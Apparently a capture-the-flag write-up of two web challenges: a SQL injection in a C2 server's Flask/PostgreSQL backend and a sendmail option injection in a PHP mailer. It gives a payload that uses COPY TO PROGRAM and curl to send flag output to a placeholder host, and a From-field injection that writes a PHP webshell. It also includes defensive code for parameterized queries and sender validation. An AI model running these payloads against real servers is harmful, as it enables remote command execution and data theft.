Name: Debugger Unchained
Difficulty: Easy
Category: Web
Description:
Our SOC team has discovered a new strain of malware in one of the workstations. They extracted what looked like a C2 profile from the infected machine’s memory and exported a network capture of the C2 traffic for further analysis. To discover the culprits, we need you to study the C2 infrastructure and check for potential weaknesses that can get us access to the server.
In the zip file, we are given two files. The c2.profile file looks like a profile that someone would use for their command and control server. Exploring the packet capture traffic.pcapng, we see that there is a lot of HTTP traffic. On further analysis, we see that there were requests to /assets/jquery-3.6.0.slim.min.js. Some were POST requests and some were GET requests.

Also, these requests include two special cookies: __cflb and __cfuid. These looked like base64 encoded JSON. I used tshark to extract the two cookies into separate files with the following commands.
Extract the __cfuid cookie:

```bash
tshark -r traffic.pcapng -Y 'http.cookie' -z 'proto,colinfo,http.cookie,http.cookie' | grep __cfuid | cut -d ';' -f 2 | sed 's/"//g' > __cfuid.txt
```
Extract the __cflb cookie:

```bash
tshark -r traffic.pcapng -Y 'http.cookie' -z 'proto,colinfo,http.cookie,http.cookie' | grep __cflb | cut -d ';' -f 1 | cut -d '"' -f 2 > __cflb.txt
```
I wrote a quick script to extract the contents of these base64 values.
```python
#!/usr/bin/env python3

import json, base64
import colorama  # only used to colour the failure message

# One extracted cookie value per line, as written by the tshark command above
with open('__cfuid.txt', 'r') as cfuid:
    lines = [line.strip() for line in cfuid]

def extract_info(line):
    # Strip the cookie name, then decode the outer base64 layer into JSON
    m0 = line.replace('__cfuid=', '')
    m1 = base64.b64decode(m0)
    data = json.loads(m1)
    task_id, output = data['id'], data['output']

    # The 'output' field is itself base64: decode it to get the command output
    m2 = base64.b64decode(output)
    print(m2.decode())

counter = 0
for line in lines:
    try:
        extract_info(line)
        counter += 1
    except (ValueError, KeyError, UnicodeDecodeError):
        # b64decode/json.loads raise ValueError on malformed input; KeyError if a field is missing
        print(f'{colorama.Fore.RED}Counter {counter} failed{colorama.Fore.RESET}')
```
It looks like output from commands.
Another interesting thing we found was that the responses to the GET requests contained a parameter called task, which included similar base64 encoded strings.
I used tshark again to extract these from the packet capture:
Checking these, we can see that the task parameter was actually used to send commands from the C2 server to the victim client.
The commands and outputs did not help much for now. While checking the responses, we also saw two HTTP 500 responses.
From the error output it seems that the application backend uses Python’s Flask. Checking the other 500 response message reveals more about the application. Let’s copy the request to Burp Suite and view its contents in our browser; we need to change the host to that of the challenge instance.
Use Burp Suite’s "show response in browser" to view it comfortably in the browser. It can be seen that the values of output and task_id are passed directly into the SQL query:
```python
db.execute(f"""INSERT INTO task_outputs(output, task_id) VALUES ('{output}', {id})""")
```
The cookie __cfuid is sending the following content:
So, if we include a SQLi payload in the cookie and send a POST request to that endpoint, we will be able to perform the injection. I used the Hackvertor extension to encode the cookie in Burp Repeater. From enumerating the database with the SQL injection, it was identified that they are using PostgreSQL. The final payload was:
```json
{"id": 1, "output": "U3', 132454); copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`/readflag|base64`'-- -"}
```
Don’t forget to encode it to base64 if you’re not using this extension.
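As an added illustration that is not code from the challenge or its author: the Python below reproduces the shape of the f-string INSERT shown above against an in-memory SQLite table and sets a parameterized version beside it. The table layout, the sample output value and the helper names are constructed for this demo; the challenge backend is PostgreSQL, where the same principle applies through the driver's own placeholder syntax.

```python
import sqlite3

# Constructed table matching the name used in the challenge's INSERT.
def setup_db():
    conn = sqlite3.connect(':memory:')
    conn.execute("CREATE TABLE task_outputs (output TEXT, task_id INTEGER)")
    return conn

def insert_vulnerable(conn, output, task_id):
    """Same shape as the challenge's f-string INSERT: both values are spliced into the
    SQL text, so a quote in `output` (or anything at all in `task_id`) is parsed as SQL."""
    sql = f"INSERT INTO task_outputs(output, task_id) VALUES ('{output}', {task_id})"
    conn.execute(sql)

def insert_safe(conn, output, task_id):
    """Hardened form: check the type of task_id, then bind both values as parameters.
    The driver sends the values separately from the statement, so they are never parsed."""
    if not isinstance(task_id, int):
        raise TypeError("task_id must be an integer")
    conn.execute(
        "INSERT INTO task_outputs(output, task_id) VALUES (?, ?)",
        (output, task_id),
    )

def stored_rows(conn):
    return list(conn.execute("SELECT output, task_id FROM task_outputs ORDER BY rowid"))

def vulnerable_breaks_on(output, task_id=7):
    """True if the string-built INSERT fails on this value (a quote ended the literal early)."""
    conn = setup_db()
    try:
        insert_vulnerable(conn, output, task_id)
    except sqlite3.Error:
        return True
    return False

def safe_roundtrip(output, task_id=7):
    """Rows stored by the parameterized INSERT; the value comes back exactly as given."""
    conn = setup_db()
    insert_safe(conn, output, task_id)
    return stored_rows(conn)

def safe_rejects_non_integer_id(task_id):
    """True if the hardened INSERT refuses a task_id that is not an int."""
    conn = setup_db()
    try:
        insert_safe(conn, "x", task_id)
    except TypeError:
        return True
    return False

if __name__ == "__main__":
    sample = "it's done"  # constructed command output containing a single quote
    print("vulnerable INSERT fails:", vulnerable_breaks_on(sample))
    print("parameterized INSERT stores:", safe_roundtrip(sample))
```

The point of the apostrophe test is that even benign command output breaks the string-built query: the data is being read as SQL grammar, which is exactly what the payload above relies on. With parameters bound, the same value is stored verbatim and the `id` field can no longer smuggle anything into the statement.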
Name: Letter Despair
Difficulty: Easy
Category: Web
Description:
A high-profile political individual was a victim of a spear-phishing attack. The email came from a legitimate government entity in a nation where we don’t have jurisdiction. However, we have traced the originating mail to a government webserver. Further enumeration revealed an open directory index containing a PHP mailer script we think was used to send the email. We need access to the server to read the logs and find out the actual perpetrator. Can you help?
Visiting the challenge endpoint, we get a directory listing:
The mailer.zip contains the source code of the mailer.php page.
mailer.php
At first I thought that it was some file upload vulnerability, judging by the attachment feature. But looking through the source code, it wasn’t the case. Even so, I ran the page locally with PHP’s built-in server to see where the uploaded file is stored. Then I saw something in the server logs.
It was calling out to sendmail. Sendmail is a CLI tool used to send emails. I installed sendmail and used pspy to see the command line used to run the binary.
It looks like the From Email parameter is passed directly into the shell command. This looks like an interesting injection point. I tried performing injections with characters such as && and ;, but these were escaped properly. I searched online and saw that there were many known exploits for PHP sendmail command injection. I came across this one: https://www.exploit-db.com/exploits/40970. Here, they were able to pass additional flag parameters onto the command using -oQ /tmp -X/var/www/cache/phpcode.php. This makes sendmail write its log, which contains the contents of the email, to a local file at /var/www/cache/phpcode.php.
Similarly, I tried with the following payload.

From Email:

```
rel[email protected] -OQueueDirectory=/tmp -X/var/www/html/cmd.php
```

Subject:

```php
<?php echo shell_exec($_GET['cmd']);?>
```

This will create a file at /var/www/html/cmd.php that will contain the PHP code from the subject. We can then use it as a webshell to run commands on the server.
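As an added, defender-side example that is not part of the original writeup or the mailer’s code: a strict validator for the From address, a no-shell argv builder for sendmail, and a scan over constructed log lines for the option-injection pattern described above (metacharacters like ; are escaped, but a space followed by -O or -X still reaches the command line). The log format, the from="..." field and the sample lines are assumptions made for this demo.

```python
import re

# Strict envelope-sender pattern: no whitespace, one '@', a dotted domain.
_ADDR_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+')

def is_safe_envelope_sender(addr):
    """True only for a plain address: a value that matches cannot contain the space
    that lets extra sendmail options ride along, and cannot start with '-'."""
    return bool(_ADDR_RE.fullmatch(addr)) and not addr.startswith('-')

def build_sendmail_argv(from_addr, sendmail='/usr/sbin/sendmail'):
    """argv for invoking sendmail without a shell (list form): the address is always
    the single argument following -f, and it is validated before use."""
    if not is_safe_envelope_sender(from_addr):
        raise ValueError(f"rejected envelope sender: {from_addr!r}")
    return [sendmail, '-t', '-i', '-f', from_addr]

def injected_option_count(from_field):
    """Number of option-looking tokens a shell would split off an unquoted From value
    (e.g. -OQueueDirectory=... or -X...). Zero for a plain address."""
    return sum(1 for tok in from_field.split()[1:] if tok.startswith('-'))

# Constructed mailer log lines in an assumed format (not the challenge's real logs).
SAMPLE_LOG = [
    'mailer.php from="alice@example.org" subject="status update"',
    'mailer.php from="bob@example.org -OQueueDirectory=/tmp -X/var/www/html/cmd.php" subject="invoice"',
]

def flag_suspicious_from_values(log_lines):
    """Return the From values in the log that carry injected sendmail options."""
    hits = []
    for line in log_lines:
        m = re.search(r'from="([^"]*)"', line)
        if m and injected_option_count(m.group(1)) > 0:
            hits.append(m.group(1))
    return hits

if __name__ == "__main__":
    print(build_sendmail_argv("alice@example.org"))
    print(flag_suspicious_from_values(SAMPLE_LOG))
```

The validator is deliberately narrower than the full RFC 5322 grammar: for an envelope sender that ends up on a command line, rejecting whitespace and a leading dash matters more than accepting every legal address, and passing argv as a list removes the shell that would otherwise split the value into extra options.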